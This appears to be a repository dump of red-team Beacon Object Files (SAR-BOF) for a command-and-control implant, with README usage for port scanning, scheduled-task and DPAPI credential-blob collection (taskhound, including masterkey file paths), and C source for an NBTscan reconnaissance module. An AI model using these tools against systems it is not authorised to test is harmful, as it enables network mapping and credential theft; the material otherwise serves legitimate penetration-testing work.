* Databases: 1433, 1521, 3306, 5432, 6379, 27017, 9200, 9300
* Windows/Domain Controllers: 135, 139, 445, 3389, 5985, 5986, 88, 389, 636, 3268, 3269
* Linux/Unix: 22, 23
* Infrastructure: 21, 25, 53, 69, 110, 111, 143, 993, 995
* Other Services: 7, 9, 13, 19, 37, 79, 113, 119, 1025, 1434, 1604, 1723, 2000, 2001, 2048, 2049, 2100, 3128, 5000, 5060, 5061, 5900, 6000, 6667, 8081, 9000, 10000, 11211

```
smartscan 192.168.1.1 -p full

smartscan 192.168.1.1-192.168.1.10 -p standart

smartscan 192.168.1.1/24 -p 20-25,80-90,443
```



## taskhound

Collect scheduled tasks from remote systems, with options to filter for domain accounts with stored credentials and save XML task definitions for offline analysis. Can also collect DPAPI credential blobs and masterkeys for offline decryption.

```
taskhound <target> [username] [password] [-save <directory>] [-unsaved-creds] [-grab-blobs]
```

- `target` (required): Remote system to collect from (IP or hostname)
- `username` (optional): Username for authentication
- `password` (optional): Password for authentication
- `-save <directory>` (optional): Directory to save XML task files locally
- `-unsaved-creds` (optional): Show tasks without stored credentials (interactive token only)
- `-grab-blobs` (optional): Also collect credential blobs and masterkeys (requires `-save` flag)

```Shell
# Basic usage with current user context
taskhound 192.168.1.100

# Using explicit credentials
taskhound DC01 -u domain\admin -p P@ssw0rd

# Save XML files locally for offline analysis
taskhound 192.168.1.100 -save C:\TaskOutput

# Show all domain tasks including those without stored credentials
taskhound 192.168.1.100 -unsaved-creds

# Combined: save files and show all tasks
taskhound DC01 -u domain\admin -p P@ssw0rd -save C:\Output -unsaved-creds

# Collect tasks + credential blobs and masterkeys for offline decryption
taskhound 192.168.1.100 -save C:\TaskOutput -grab-blobs

# Full collection with credentials
taskhound DC01 -u domain\admin -p P@ssw0rd -save C:\Output -grab-blobs
```

**DPAPI Collection:**

When the `-grab-blobs` flag is used along with `-save`, TaskHound will additionally collect:
- **Credential Blobs**: `C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\*`
- **SYSTEM Masterkeys**: `C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\*`

These files are saved to:
- `<save_dir>\<hostname>\credentials\*` (credential blobs)
- `<save_dir>\<hostname>\masterkeys\*` (masterkeys)

The collected DPAPI files can be used with offline decryption tools to extract stored credentials from scheduled tasks.



## quser

Query user sessions on a remote machine, providing session information.

```
quser [host]
```



## Credits
* TaskHound - https://github.com/1r0BIT/TaskHound
* Quser-BOF - https://github.com/netero1010/Quser-BOF
* NBTscan - https://github.com/shashinma/NBTscan-BOF

================================================
FILE: SAR-BOF/nbtscan/nbtscan.c
================================================
#include "nbtscan.h"

void bofstart() {}
void bofstop() {}

static unsigned int nbtscan_strlen(const char *s) {
    return (unsigned int)MSVCRT$strlen(s);
}

static void nbtscan_strcpy(char *dst, const char *src) {
    MSVCRT$strcpy(dst, src);
}

static char *nbtscan_strchr(char *s, int c) {
    return MSVCRT$strchr(s, c);
}

static unsigned long nbtscan_strtoul(const char *s) {
    return MSVCRT$strtoul(s, NULL, 10);
}

static char nbtscan_upper(char c) {
    if (c >= 'a' && c <= 'z') {
        return (char)(c - 'a' + 'A');
    }
    return c;
}

static my_uint16_t nbtscan_get16(const unsigned char *data) {
    return (my_uint16_t)((data[0] << 8) | data[1]);
}

static my_uint32_t nbtscan_get32(const unsigned char *data) {
    return ((my_uint32_t)data[0] << 24) |
           ((my_uint32_t)data[1] << 16) |
           ((my_uint32_t)data[2] << 8)  |
           (my_uint32_t)data[3];
}

static int nbtscan_is_ip(const char *s, ip_range32_t *range) {
    unsigned long addr = WS2_32$inet_addr(s);
    if (addr == 0xFFFFFFFFUL) {
        return 0;
    }
    my_uint32_t h = WS2_32$ntohl(addr);
    range->start_ip = h;
    range->end_ip   = h;
    return 1;
}

static int nbtscan_is_range_dash(char *s, ip_range32_t *range) {
    char *dash = nbtscan_strchr(s, '-');
    if (!dash) return 0;

    *dash = '\0';
    char *first = s;
    char *second = dash + 1;

    unsigned long addr1 = WS2_32$inet_addr(first);
    if (addr1 == 0xFFFFFFFFUL) {
        return 0;
    }
    my_uint32_t start_h = WS2_32$ntohl(addr1);

    if (nbtscan_strchr(second, '.') != NULL) {
        unsigned long addr2 = WS2_32$inet_addr(second);
        if (addr2 == 0xFFFFFFFFUL) {
            return 0;
        }
        my_uint32_t end_h = WS2_32$ntohl(addr2);
        if (end_h < start_h) return 0;
        range->start_ip = start_h;
        range->end_ip   = end_h;
        return 1;
    }

    unsigned long last_octet = nbtscan_strtoul(second);
    if (last_octet > 255) return 0;

    my_uint32_t end_h = (start_h & 0xFFFFFF00UL) | last_octet;
    if (end_h < start_h) return 0;
    range->start_ip = start_h;
    range->end_ip   = end_h;
    return 1;
}

static int nbtscan_is_cidr(char *s, ip_range32_t *range) {
    char *slash = nbtscan_strchr(s, '/');
    if (!slash) return 0;

    *slash = '\0';
    char *ip_part = s;
    char *mask_part = slash + 1;

    unsigned long addr = WS2_32$inet_addr(ip_part);
    if (addr == 0xFFFFFFFFUL) {
        return 0;
    }
    unsigned long mask_bits = nbtscan_strtoul(mask_part);
    if (mask_bits == 0 || mask_bits > 32) {
        return 0;
    }

    my_uint32_t h = WS2_32$ntohl(addr);
    my_uint32_t mask32;
    if (mask_bits == 32) {
        mask32 = 0xFFFFFFFFUL;
    } else {
        mask32 = ((1UL << mask_bits) - 1UL) << (32 - mask_bits);
    }
    my_uint32_t start = h & mask32;
    my_uint32_t end   = start | ~mask32;

    range->start_ip = start;
    range->end_ip   = end;
    return 1;
}

static int nbtscan_expand_range(const ip_range32_t *range, char ***out_list, int *out_count, int *total_ips) {
    my_uint32_t count = (range->end_ip >= range->start_ip)
                        ? (range->end_ip - range->start_ip + 1)
                        : 0;
    if (count == 0) return 0;

    if (*total_ips + (int)count > NBTS_MAX_IPS) {
        count = NBTS_MAX_IPS - *total_ips;
    }
    if (count == 0) return 0;

    int new_total = *total_ips + (int)count;
    char **new_list = (char**)intRealloc(*out_list, new_total * sizeof(char*));
    if (!new_list) {
        return 0;
    }
    *out_list = new_list;

    for (my_uint32_t i = 0; i < count; i++) {
        my_uint32_t ip_h = range->start_ip + i;
        struct in_addr a;
        a.s_addr = WS2_32$htonl(ip_h);
        char *s = WS2_32$inet_ntoa(a);
        if (!s) continue;

        char *dst = (char*)intAlloc(16);
        if (!dst) continue;
        nbtscan_strcpy(dst, s);
        (*out_list)[*total_ips + (int)i] = dst;
    }
    *out_count = new_total;
    *total_ips = new_total;
    return 1;
}

static int nbtscan_parse_targets(const char *targets, char ***out_list, int *out_count) {
    *out_list = NULL;
    *out_count = 0;
    if (!targets || !targets[0]) return 0;

    unsigned int len = nbtscan_strlen(targets);
    char *copy = (char*)intAlloc(len + 1);
    if (!copy) return 0;
    nbtscan_strcpy(copy, targets);

    char **result = NULL;
    int total = 0;

    char *ctx = NULL;
    char *token = MSVCRT$strtok_s(copy, ",", &ctx);
    while (token && total < NBTS_MAX_IPS) {
        while (*token == ' ' || *token == '\t') token++;

        char *end = token + nbtscan_strlen(token);
        while (end > token && (end[-1] == ' ' || end[-1] == '\t' || end[-1] == '\r' || end[-1] == '\n')) {
            *--end = '\0';
        }

        ip_range32_t range;
        int is_range = 0;

        char *work = (char*)intAlloc(nbtscan_strlen(token) + 1);
        if (!work) {
            break;
        }
        nbtscan_strcpy(work, token);

        if (nbtscan_is_cidr(work, &range)) {
            is_range = 1;
        } else {
            nbtscan_strcpy(work, token);
            if (nbtscan_is_range_dash(work, &range)) {
                is_range = 1;
            } else {
                nbtscan_strcpy(work, token);
                if (nbtscan_is_ip(work, &range)) {
                    is_range = 1;
                }
            }
        }

        if (is_range) {
            nbtscan_expand_range(&range, &result, &total, &total);
        }

        intFree(work);
        token = MSVCRT$strtok_s(NULL, ",", &ctx);
    }

    intFree(copy);
    *out_list = result;
    *out_count = total;
    return (total > 0);
}

static void nbtscan_free_targets(char **list, int count) {
    if (!list) return;
    for (int i = 0; i < count; i++) {
        if (list[i]) {
            intFree(list[i]);
        }
    }
    intFree(list);
}

static void nbtscan_name_mangle_star(char *out_name) {
    char buf[16];
    MSVCRT$memset(buf, 0, sizeof(buf));
    buf[0] = '*';

    char *p = out_name;
    p[0] = 32;
    p++;

    for (int i = 0; i < 16; i++) {
        int c = (unsigned char)nbtscan_upper(buf[i]);
        p[2 * i]     = (char)(((c >> 4) & 0x0F) + 'A');
        p[2 * i + 1] = (char)((c & 0x0F) + 'A');
    }
    p[32] = 0;
}

static int nbtscan_send_query(SOCKET sock, struct in_addr addr, my_uint16_t tid) {
    nbname_request_t req;
    MSVCRT$memset(&req, 0, sizeof(req));

    req.transaction_id          = WS2_32$htons(tid);
    req.flags                   = WS2_32$htons(0x0010);
    req.question_count          = WS2_32$htons(1);
    req.answer_count            = 0;
    req.name_service_count      = 0;
    req.additional_record_count = 0;

    nbtscan_name_mangle_star(req.question_name);
    req.question_type  = WS2_32$htons(NBNAME_QUESTION_TYPE);
    req.question_class = WS2_32$htons(NBNAME_QUESTION_CLASS);

    struct sockaddr_in dst;
    MSVCRT$memset(&dst, 0, sizeof(dst));
    dst.sin_family = AF_INET;
    dst.sin_port   = WS2_32$htons(NB_DGRAM);
    dst.sin_addr   = addr;

    int status = WS2_32$sendto(sock, (char*)&req, sizeof(req), 0, (struct sockaddr*)&dst, sizeof(dst));
    return (status >= 0);
}

static int nbtscan_parse_response(unsigned char *buff, int buffsize, nb_host_info_t *out) {
    if (!buff || buffsize < 0) return 0;
    MSVCRT$memset(out, 0, sizeof(*out));

    int offset = 0;

    if (buffsize < 57) {
        return 0;
    }

    nbname_response_header_t *hdr = (nbname_response_header_t*)intAlloc(sizeof(nbname_response_header_t));
    if (!hdr) return 0;

    hdr->transaction_id          = nbtscan_get16(buff + offset); offset += 2;
    hdr->flags                   = nbtscan_get16(buff + offset); offset += 2;
    hdr->question_count          = nbtscan_get16(buff + offset); offset += 2;
    hdr->answer_count            = nbtscan_get16(buff + offset); offset += 2;
    hdr->name_service_count      = nbtscan_get16(buff + offset); offset += 2;
    hdr->additional_record_count = nbtscan_get16(buff + offset); offset += 2;

    if (offset + 34 > buffsize) {
        intFree(hdr);
        return 0;
    }
    MSVCRT$memcpy(hdr->question_name, buff + offset, 34);
    offset += 34;

    if (offset + 2 > buffsize) { intFree(hdr); return 0; }
    hdr->question_type = nbtscan_get16(buff + offset); offset += 2;
    if (offset + 2 > buffsize) { intFree(hdr); return 0; }
    hdr->question_class = nbtscan_get16(buff + offset); offset += 2;

    if (offset + 4 > buffsize) { intFree(hdr); return 0; }
    hdr->ttl = nbtscan_get32(buff + offset); offset += 4;

    if (offset + 2 > buffsize) { intFree(hdr); return 0; }
    hdr->rdata_length = nbtscan_get16(buff + offset); offset += 2;

    if (offset + 1 > buffsize) { intFree(hdr); return 0; }
    hdr->number_of_names = buff[offset]; offset += 1;

    out->header = hdr;

    int name_count = hdr->number_of_names;
    int table_size = name_count * (int)sizeof(nbname_t);
    if (table_size > 0) {
        if (offset + table_size > buffsize) {
            return 1;
        }

        nbname_t *names = (nbname_t*)intAlloc(table_size);
        if (!names) {
            return 1;
        }
        for (int i = 0; i < name_count; i++) {
            MSVCRT$memcpy(names[i].ascii_name, buff + offset, 16);
            offset += 16;
            if (offset + 2 > buffsize) {
                return 1;
            }
            names[i].rr_flags = nbtscan_get16(buff + offset);
            offset += 2;
        }
        out->names = names;
    }

    if (offset + 6 > buffsize) {
        return 1;
    }

    nbname_response_footer_t *foot = (nbname_response_footer_t*)intAlloc(sizeof(nbname_response_footer_t));
    if (!foot) {
        return 1;
    }
    MSVCRT$memset(foot, 0, sizeof(*foot));

    MSVCRT$memcpy(foot->adapter_address, buff + offset, 6);
    offset += 6;

    out->footer = foot;
    return 1;
}

static void nbtscan_free_hostinfo(nb_host_info_t *info) {
    if (!info) return;
    if (info->header) intFree(info->header);
    if (info->names)  intFree(info->names);
    if (info->footer) intFree(info->footer);
    MSVCRT$memset(info, 0, sizeof(*info));
}

static void nbtscan_print_header(void) {
    BeaconPrintf(CALLBACK_OUTPUT, "%-17s%-17s%-17s%-10s%-17s%-17s",
                 "IP address",
                 "NetBIOS Name",
                 "Domain/Workgroup",
                 "Server",
                 "User",
                 "MAC address");
}

static void nbtscan_pick_names(const nb_host_info_t *info,
                               char *comp_name,
                               char *user_name,
                               char *domain_name,
                               int *is_server,
                               int *is_domain) {
    comp_name[0] = '\0';
    user_name[0] = '\0';
    if (domain_name) domain_name[0] = '\0';
    *is_server = 0;
    if (is_domain) *is_domain = 0;

    if (!info->header || !info->names) return;

    int first_name = 1;
    for (int i = 0; i < info->header->number_of_names; i++) {
        unsigned char service = (unsigned char)info->names[i].ascii_name[15];
        int unique = !(info->names[i].rr_flags & 0x8000);

        if (service == 0x00 && unique && first_name) {
            MSVCRT$memcpy(comp_name, info->names[i].ascii_name, 15);
            comp_name[15] = 0;
            first_name = 0;
        }
        if (service == 0x00 && !unique && domain_name && !domain_name[0]) {
            MSVCRT$memcpy(domain_name, info->names[i].ascii_name, 15);
            domain_name[15] = 0;
            int len = MSVCRT$strlen(domain_name);
            while (len > 0 && domain_name[len - 1] == ' ') {
                domain_name[len - 1] = '\0';
                len--;
            }
        }
        if (is_domain && (service == 0x1B || service == 0x1C)) {
            *is_domain = 1;
        }
        if (service == 0x20 && unique) {
            *is_server = 1;
        }
        if (service == 0x03 && unique) {
            MSVCRT$memcpy(user_name, info->names[i].ascii_name, 15);
            user_name[15] = 0;
        }
    }
    
    if (is_domain && domain_name && domain_name[0] && *is_domain == 0) {
        const char *workgroup_names[] = {
            "WORKGROUP",
            "MSHOME",
            "HOME",
            NULL
        };
        
        int is_standard_workgroup = 0;
        for (int i = 0; workgroup_names[i] != NULL; i++) {
            int j = 0;
            int match = 1;
            while (domain_name[j] != '\0' && workgroup_names[i][j] != '\0') {
                char c1 = nbtscan_upper(domain_name[j]);
                char c2 = nbtscan_upper(workgroup_names[i][j]);
                if (c1 != c2) {
                    match = 0;
                    break;
                }
                j++;
            }
            if (match && domain_name[j] == '\0' && workgroup_names[i][j] == '\0') {
                is_standard_workgroup = 1;
                break;
            }
        }
        
        if (!is_standard_workgroup) {
            int len = MSVCRT$strlen(domain_name);
            if (len >= 4) {
                char prefix[5] = {0};
                MSVCRT$memcpy(prefix, domain_name, 4);
                prefix[0] = nbtscan_upper(prefix[0]);
                prefix[1] = nbtscan_upper(prefix[1]);
                prefix[2] = nbtscan_upper(prefix[2]);
                prefix[3] = nbtscan_upper(prefix[3]);
                if (MSVCRT$strcmp(prefix, "HOME") == 0) {
                    int all_digits = 1;
                    for (int k = 4; k < len; k++) {
                        if (domain_name[k] < '0' || domain_name[k] > '9') {
                            all_digits = 0;
                            break;
                        }
                    }
                    if (all_digits) {
                        is_standard_workgroup = 1;
                    }
                }
            }
        }
        
        if (!is_standard_workgroup) {
            *is_domain = 1;
        }
    }
}

static void nbtscan_print_hostinfo_normal(const char *ip, const nb_host_info_t *info) {
    char comp_name[16];
    char user_name[16];
    char domain_name[16];
    int is_server = 0;

    nbtscan_pick_names(info, comp_name, user_name, domain_name, &is_server, NULL);
    if (!comp_name[0]) nbtscan_strcpy(comp_name, "<unknown>");
    if (!user_name[0]) nbtscan_strcpy(user_name, "<unknown>");
    if (!domain_name[0]) nbtscan_strcpy(domain_name, "<unknown>");

    if (info->footer) {
        BeaconPrintf(CALLBACK_OUTPUT,
                     "%-17s%-17s%-17s%-10s%-17s%02x:%02x:%02x:%02x:%02x:%02x",
                     ip,
                     comp_name,
                     domain_name,
                     is_server ? "<server>" : "",
                     user_name,
                     info->footer->adapter_address[0],
                     info->footer->adapter_address[1],
                     info->footer->adapter_address[2],
                     info->footer->adapter_address[3],
                     info->footer->adapter_address[4],
                     info->footer->adapter_address[5]);
    } else {
        BeaconPrintf(CALLBACK_OUTPUT,
                     "%-17s%-17s%-17s%-10s%-17s",
                     ip,
                     comp_name,
                     domain_name,
                     is_server ? "<server>" : "",
                     user_name);
    }
}

static void nbtscan_print_hostinfo_verbose(const char *ip,
                                           const nb_host_info_t *info,
                                           const char *sep,
                                           int script_mode) {
    if (!info->header || !info->names) return;

    if (!script_mode) {
        BeaconPrintf(CALLBACK_OUTPUT, "\nNetBIOS Name Table for Host %s:\n", ip);
    }

    for (int i = 0; i < info->header->number_of_names; i++) {
        char name[16];
        MSVCRT$memcpy(name, info->names[i].ascii_name, 15);
        name[15] = 0;
        unsigned char service = (unsigned char)info->names[i].ascii_name[15];
        int unique = !(info->names[i].rr_flags & 0x8000);

        // Trim trailing spaces in script mode for cleaner output
        if (script_mode) {
            int len = MSVCRT$strlen(name);
            while (len > 0 && name[len - 1] == ' ') {
                name[len - 1] = '\0';
                len--;
            }
        }

        if (script_mode) {
            BeaconPrintf(CALLBACK_OUTPUT,
                         "%s%s%s%s%02x%s%s",
                         ip,
                         sep,
                         name,
                         sep,
                         service,
                         sep,
                         unique ? "U" : "G");
        } else {
            BeaconPrintf(CALLBACK_OUTPUT,
                         "%-17s<%02x>%s",
                         name,
                         service,
                         unique ? " UNIQUE" : " GROUP");
        }
    }

    if (!script_mode && info->footer) {
        BeaconPrintf(CALLBACK_OUTPUT,
                     "Adapter address: %02x:%02x:%02x:%02x:%02x:%02x",
                     info->footer->adapter_address[0],
                     info->footer->adapter_address[1],
                     info->footer->adapter_address[2],
                     info->footer->adapter_address[3],
                     info->footer->adapter_address[4],
                     info->footer->adapter_address[5]);
    }
}

static void nbtscan_print_hostinfo_hosts(const char *ip,
                                         const nb_host_info_t *info,
                                         int lmhosts) {
    char comp_name[16];
    char dummy_user[16];
    int dummy_server = 0;

    nbtscan_pick_names(info, comp_name, dummy_user, NULL, &dummy_server, NULL);
    if (!comp_name[0]) nbtscan_strcpy(comp_name, "<unknown>");

    if (lmhosts) {
        BeaconPrintf(CALLBACK_OUTPUT, "%s\t%s\t#PRE", ip, comp_name);
    } else {
        BeaconPrintf(CALLBACK_OUTPUT, "%s\t%s", ip, comp_name);
    }
}

void go(char *args, int alen) {
    datap parser;
    char *targets = NULL;
    int verbose = 0;
    int quiet = 0;
    int etc_hosts = 0;
    int lmhosts = 0;
    char *sep = NULL;
    int timeout_ms = 1000;

    BeaconDataParse(&parser, args, alen);
    targets    = (char*)BeaconDataExtract(&parser, NULL);
    verbose    = BeaconDataInt(&parser);
    quiet      = BeaconDataInt(&parser);
    etc_hosts  = BeaconDataInt(&parser);
    lmhosts    = BeaconDataInt(&parser);
    sep        = (char*)BeaconDataExtract(&parser, NULL);
    timeout_ms = BeaconDataInt(&parser);

    if (!targets || !targets[0]) {
        BeaconPrintf(CALLBACK_ERROR, "nbtscan: no targets specified");
        return;
    }

    if (timeout_ms <= 0) timeout_ms = 1000;

    WSADATA wsa;
    if (WS2_32$WSAStartup(MAKEWORD(2, 2), &wsa) != 0) {
        BeaconPrintf(CALLBACK_ERROR, "nbtscan: WSAStartup failed");
        return;
    }

    SOCKET sock = WS2_32$socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if (sock == INVALID_SOCKET) {
        BeaconPrintf(CALLBACK_ERROR, "nbtscan: socket() failed");
        WS2_32$WSACleanup();
        return;
    }

    char **ip_list = NULL;
    int ip_count = 0;
    if (!nbtscan_parse_targets(targets, &ip_list, &ip_count) || ip_count == 0) {
        BeaconPrintf(CALLBACK_ERROR, "nbtscan: invalid targets string");
        WS2_32$closesocket(sock);
        WS2_32$WSACleanup();
        return;
    }

    int script_mode = 0;
    const char *script_sep = ",";
    if (sep && sep[0]) {
        script_mode = (!etc_hosts && !lmhosts);
        script_sep = sep;
    }

    if (!etc_hosts && !lmhosts && !script_mode && !quiet) {
        nbtscan_print_header();
    }

    struct in_addr *ip_addrs = (struct in_addr*)intAlloc(ip_count * sizeof(struct in_addr));
    unsigned char *seen = (unsigned char*)intAlloc(ip_count);
    if (!ip_addrs || !seen) {
        BeaconPrintf(CALLBACK_ERROR, "nbtscan: memory allocation failed");
        if (ip_addrs) intFree(ip_addrs);
        if (seen) intFree(seen);
        nbtscan_free_targets(ip_list, ip_count);
        WS2_32$closesocket(sock);
        WS2_32$WSACleanup();
        return;
    }
    MSVCRT$memset(seen, 0, ip_count);

    my_uint16_t tid = 1;

    for (int i = 0; i < ip_count; i++) {
        unsigned long raw = WS2_32$inet_addr(ip_list[i]);
        if (raw == 0xFFFFFFFFUL) {
            if (!quiet) {
                BeaconPrintf(CALLBACK_ERROR, "nbtscan: invalid IP %s", ip_list[i]);
            }
            ip_addrs[i].s_addr = 0;
            continue;
        }

        ip_addrs[i].s_addr = raw;

        if (!nbtscan_send_query(sock, ip_addrs[i], tid++)) {
            if (!quiet) {
                BeaconPrintf(CALLBACK_ERROR, "nbtscan: failed to send to %s", ip_list[i]);
            }
            continue;
        }
    }

    for (;;) {
        fd_set rfds;
        FD_ZERO(&rfds);
        FD_SET(sock, &rfds);

        struct timeval tv;
        tv.tv_sec = timeout_ms / 1000;
        tv.tv_usec = (timeout_ms % 1000) * 1000;

        int sel = WS2_32$select((int)(sock + 1), &rfds, NULL, NULL, &tv);
        if (sel <= 0) {
            break;
        }

        unsigned char buff[1024];
        struct sockaddr_in src;
        int slen = sizeof(src);
        int n = WS2_32$recvfrom(sock, (char*)buff, sizeof(buff), 0, (struct sockaddr*)&src, &slen);
        if (n <= 0) {
            continue;
        }

        const char *ip_str = NULL;
        int idx = -1;
        for (int i = 0; i < ip_count; i++) {
            if (ip_addrs[i].s_addr != 0 && ip_addrs[i].s_addr == src.sin_addr.s_addr) {
                idx = i;
                ip_str = ip_list[i];
                break;
            }
        }

        if (!ip_str) {
            ip_str = WS2_32$inet_ntoa(src.sin_addr);
        } else if (idx >= 0 && seen[idx]) {
            continue;
        }

        if (idx >= 0) {
            seen[idx] = 1;
        }

        nb_host_info_t info;
        MSVCRT$memset(&info, 0, sizeof(info));
        if (!nbtscan_parse_response(buff, n, &info)) {
            if (!quiet && ip_str) {
                BeaconPrintf(CALLBACK_OUTPUT, "%s\tinvalid NBSTAT response", ip_str);
            }
            nbtscan_free_hostinfo(&info);
            continue;
        }

        if (etc_hosts || lmhosts) {
            nbtscan_print_hostinfo_hosts(ip_str, &info, lmhosts);
        } else if (script_mode) {
            nbtscan_print_hostinfo_verbose(ip_str, &info, script_sep, 1);
        } else if (verbose) {
            nbtscan_print_hostinfo_normal(ip_str, &info);
            nbtscan_print_hostinfo_verbose(ip_str, &info, script_sep, 0);
        } else {
            nbtscan_print_hostinfo_normal(ip_str, &info);
        }

        nbtscan_free_hostinfo(&info);
    }

    if (ip_addrs) intFree(ip_addrs);
    if (seen) intFree(seen);
    nbtscan_free_targets(ip_list, ip_count);
    WS2_32$closesocket(sock);
    WS2_32$WSACleanup();
}


================================================
FILE: SAR-BOF/nbtscan/nbtscan.h
================================================
#ifndef NBTSCAN_H
#define NBTSCAN_H

#include <winsock2.h>
#include <windows.h>

#include "beacon.h"
#include "bofdefs.h"

__declspec(dllimport) unsigned long __stdcall WS2_32$inet_addr(const char *cp);
__declspec(dllimport) unsigned short __stdcall WS2_32$htons(unsigned short hostshort);
__declspec(dllimport) unsigned long __stdcall WS2_32$ntohl(unsigned long netlong);
DECLSPEC_IMPORT unsigned int __stdcall WS2_32$socket(int af, int type, int protocol);
__declspec(dllimport) int __stdcall WS2_32$closesocket(SOCKET);
__declspec(dllimport) int __stdcall WS2_32$sendto(SOCKET, const char*, int, int, const struct sockaddr*, int);
__declspec(dllimport) int __stdcall WS2_32$recvfrom(SOCKET, char*, int, int, struct sockaddr*, int*);
__declspec(dllimport) int __stdcall WS2_32$select(int, fd_set*, fd_set*, fd_set*, const struct timeval*);
__declspec(dllimport) int __stdcall WS2_32$WSAStartup(WORD, LPWSADATA);
__declspec(dllimport) int __stdcall WS2_32$WSACleanup(void);
__declspec(dllimport) char* __stdcall WS2_32$inet_ntoa(struct in_addr);

#define NB_DGRAM                137
#define NBNAME_QUESTION_TYPE    0x21
#define NBNAME_QUESTION_CLASS   0x01

typedef unsigned __int8  my_uint8_t;
typedef unsigned __int16 my_uint16_t;
typedef unsigned __int32 my_uint32_t;

typedef struct _nbname {
    char        ascii_name[16];
    my_uint16_t rr_flags;
} nbname_t;

typedef struct _nbname_response_header {
    my_uint16_t transaction_id;
    my_uint16_t flags;
    my_uint16_t question_count;
    my_uint16_t answer_count;
    my_uint16_t name_service_count;
    my_uint16_t additional_record_count;
    char        question_name[34];
    my_uint16_t question_type;
    my_uint16_t question_class;
    my_uint32_t ttl;
    my_uint16_t rdata_length;
    my_uint8_t  number_of_names;
} nbname_response_header_t;

typedef struct _nbname_response_footer {
    my_uint8_t  adapter_address[6];
} nbname_response_footer_t;

typedef struct _nb_host_info {
    nbname_response_header_t *header;
    nbname_t                 *names;
    nbname_response_footer_t *footer;
} nb_host_info_t;

typedef struct _nbname_request {
    my_uint16_t transaction_id;
    my_uint16_t flags;
    my_uint16_t question_count;
    my_uint16_t answer_count;
    my_uint16_t name_service_count;
    my_uint16_t additional_record_count;
    char        question_name[34];
    my_uint16_t question_type;
    my_uint16_t question_class;
} nbname_request_t;

#define NBTS_MAX_IPS  8192

typedef struct _ip_range32 {
    my_uint32_t start_ip;
    my_uint32_t end_ip;
} ip_range32_t;

#endif

================================================
FILE: SAR-BOF/quser/base.c
================================================
#include <windows.h>
#include "bofdefs.h"
#include "beacon.h"
#ifndef bufsize
#define bufsize 8192
#endif


char * output __attribute__((section (".data"))) = 0;  // this is just done so its we don't go into .bss which isn't handled properly
WORD currentoutsize __attribute__((section (".data"))) = 0;
HANDLE trash __attribute__((section (".data"))) = NULL; // Needed for x64 to not give relocation error

#ifdef BOF
int bofstart();
void internal_printf(const char* format, ...);
void printoutput(BOOL done);
#endif
char * Utf16ToUtf8(const wchar_t* input);

int bofstart()
{   
    output = (char*)MSVCRT$calloc(bufsize, 1);
    currentoutsize = 0;
    return 1;
}

void internal_printf(const char* format, ...){
    int buffersize = 0;
    int transfersize = 0;
    char * curloc = NULL;
    char* intBuffer = NULL;
    va_list args;
    va_start(args, format);
    buffersize = MSVCRT$vsnprintf(NULL, 0, format, args); // +1 because vsprintf goes to buffersize-1 , and buffersize won't return with the null
    va_end(args);
    
    // vsnprintf will return -1 on encoding failure (ex. non latin characters in Wide string)
    if (buffersize == -1)
        return;
    
    char* transferBuffer = (char*)intAlloc(bufsize);
    intBuffer = (char*)intAlloc(buffersize);
    /*Print string to memory buffer*/
    va_start(args, format);
    MSVCRT$vsnprintf(intBuffer, buffersize, format, args); // tmpBuffer2 has a null terminated string
    va_end(args);
    if(buffersize + currentoutsize < bufsize) // If this print doesn't overflow our output buffer, just buffer it to the end
    {
        //BeaconFormatPrintf(&output, intBuffer);
        MSVCRT$memcpy(output+currentoutsize, intBuffer, buffersize);
        currentoutsize += buffersize;
    }
    else // If this print does overflow our output buffer, lets print what we have and clear any thing else as it is likely this is a large print
    {
        curloc = intBuffer;
        while(buffersize > 0)
        {
            transfersize = bufsize - currentoutsize; // what is the max we could transfer this request
            if(buffersize < transfersize) //if I have less then that, lets just transfer what's left
            {
                transfersize = buffersize;
            }
            MSVCRT$memcpy(output+currentoutsize, curloc, transfersize); // copy data into our transfer buffer
            currentoutsize += transfersize;
            if(currentoutsize == bufsize)
            {
            printoutput(FALSE); // sets currentoutsize to 0 and prints
            }
            MSVCRT$memset(transferBuffer, 0, transfersize); // reset our transfer buffer
            curloc += transfersize; // increment by how much data we just wrote
            buffersize -= transfersize; // subtract how much we just wrote from how much we are writing overall
        }
    }
    intFree(intBuffer);
    intFree(transferBuffer);
}

void printoutput(BOOL done)
{

    char * msg = NULL;
    BeaconOutput(CALLBACK_OUTPUT, output, currentoutsize);
    currentoutsize = 0;
    MSVCRT$memset(output, 0, bufsize);
    if(done) {MSVCRT$free(output); output=NULL;}
}


#ifdef DYNAMIC_LIB_COUNT


typedef struct loadedLibrary {
    HMODULE hMod; // mod handle
    const char * name; // name normalized to uppercase
}loadedLibrary, *ploadedLibrary;
loadedLibrary loadedLibraries[DYNAMIC_LIB_COUNT] __attribute__((section (".data"))) = {0};
DWORD loadedLibrariesCount __attribute__((section (".data"))) = 0;

BOOL intstrcmp(LPCSTR szLibrary, LPCSTR sztarget)
{
    BOOL bmatch = FALSE;
    DWORD pos = 0;
    while(szLibrary[pos] && sztarget[pos])
    {
        if(szLibrary[pos] != sztarget[pos])
        {
            goto end;
        }
        pos++;
    }
    if(szLibrary[pos] | sztarget[pos]) // if either of these down't equal null then they can't match
        {goto end;}
    bmatch = TRUE;

    end:
    return bmatch;
}

FARPROC DynamicLoad(const char * szLibrary, const char * szFunction)
{
    FARPROC fp = NULL;
    HMODULE hMod = NULL;
    DWORD i = 0;
    DWORD liblen = 0;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        if(intstrcmp(szLibrary, loadedLibraries[i].name))
        {
            hMod = loadedLibraries[i].hMod;
        }
    }
    if(!hMod)
    {
        hMod = LoadLibraryA(szLibrary);
        if(!hMod){ 
            BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\nCould not find library to load.", szLibrary);
            return NULL;
        }
        loadedLibraries[loadedLibrariesCount].hMod = hMod;
        loadedLibraries[loadedLibrariesCount].name = szLibrary; //And this is why this HAS to be a constant or not freed before bofstop
        loadedLibrariesCount++;
    }
    fp = GetProcAddress(hMod, szFunction);

    if (NULL == fp)
    {
        BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\n", szFunction);
    }
    return fp;
}
#endif


char* Utf16ToUtf8(const wchar_t* input)
{
    int ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        NULL,
        0,
        NULL,
        NULL
    );

    char* newString = (char*)intAlloc(sizeof(char) * ret);

